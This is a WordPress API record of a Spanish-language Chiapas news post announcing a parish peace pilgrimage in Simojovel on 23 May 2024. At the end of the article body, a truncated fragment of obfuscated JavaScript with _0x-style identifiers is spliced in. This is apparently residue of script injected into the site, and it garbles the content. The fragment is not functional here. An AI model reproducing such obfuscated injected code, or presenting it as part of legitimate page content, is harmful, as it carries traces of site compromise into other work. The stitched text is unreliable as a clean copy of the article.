{"id":15721,"date":"2024-05-22T02:50:04","date_gmt":"2024-05-22T02:50:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15721"},"modified":"2024-05-22T02:50:05","modified_gmt":"2024-05-22T02:50:05","slug":"convocan-a-peregrinacion-por-la-paz-y-la-vida-en-simojovel","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15721","title":{"rendered":"Convocan a Peregrinaci\u00f3n por la Paz y la Vida en Simojovel"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/WhatsApp-Image-2024-05-21-at-5.18.30-PM-1024x1024.jpeg\" alt=\"\" class=\"wp-image-15722\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/WhatsApp-Image-2024-05-21-at-5.18.30-PM-1024x1024.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/WhatsApp-Image-2024-05-21-at-5.18.30-PM-300x300.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/WhatsApp-Image-2024-05-21-at-5.18.30-PM-150x150.jpeg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/WhatsApp-Image-2024-05-21-at-5.18.30-PM-768x768.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/WhatsApp-Image-2024-05-21-at-5.18.30-PM.jpeg 1440w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>21 de Mayo del 2024. San Crist\u00f3bal de Las Casas.- El Pueblo Creyente de la Parroquia de Simojovel ha lanzado una convocatoria abierta a la comunidad para participar en la Peregrinaci\u00f3n por la Paz y la Vida, que se llevar\u00e1 a cabo el pr\u00f3ximo 23 de mayo a las 9 de la ma\u00f1ana. Esta marcha, que busca promover la paz y el respeto por la vida, se iniciar\u00e1 en la Capilla de San Antonio de Padua, ubicada a 2 kil\u00f3metros antes de llegar a la cabecera municipal.<\/p>\n\n\n\n<p>Seg\u00fan los convocantes, el evento se realiza en un contexto de creciente preocupaci\u00f3n por la violencia y la inseguridad en la regi\u00f3n. \u201cLa peregrinaci\u00f3n no solo es un llamado a la paz, sino tambi\u00e9n un acto de solidaridad comunitaria y de reflexi\u00f3n espiritual. Los organizadores esperan que la participaci\u00f3n masiva de los fieles y ciudadanos refuerce el mensaje de unidad y esperanza en tiempos dif\u00edciles\u201d.<\/p>\n\n\n\n<p>Desde la parroquia de Simojovel, los l\u00edderes religiosos han subrayado la importancia de este tipo de iniciativas para fortalecer el tejido social y fomentar valores de convivencia pac\u00edfica. \u201cLa marcha ser\u00e1 una oportunidad para que los participantes expresen su compromiso con la no violencia y la protecci\u00f3n de la vida humana\u201d.<\/p>\n\n\n\n<p>\u201cSe invita a todos los interesados a reunirse en la Capilla de San Antonio de Padua a la hora se\u00f1alada. La peregrinaci\u00f3n promete ser un evento significativo, no solo para los habitantes de Simojovel, sino para toda la regi\u00f3n, subrayando el poder de la fe y la comunidad en la b\u00fasqueda de un futuro m\u00e1s seguro y armonioso\u201d, se\u00f1ala la invitaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 21 de Mayo del 2024. San Crist\u00f3bal de Las Casas.- El Pueblo Creyente de la Parroquia de Simojovel ha lanzado una convocatoria abierta a la comunidad para participar en la Peregrinaci\u00f3n por la Paz y la Vida, que se llevar\u00e1 a cabo el pr\u00f3ximo 23 de mayo a las 9 de la &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15722,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15721","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15721","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15721"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15721\/revisions"}],"predecessor-version":[{"id":15723,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15721\/revisions\/15723"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15722"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15721"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15721"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15721"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}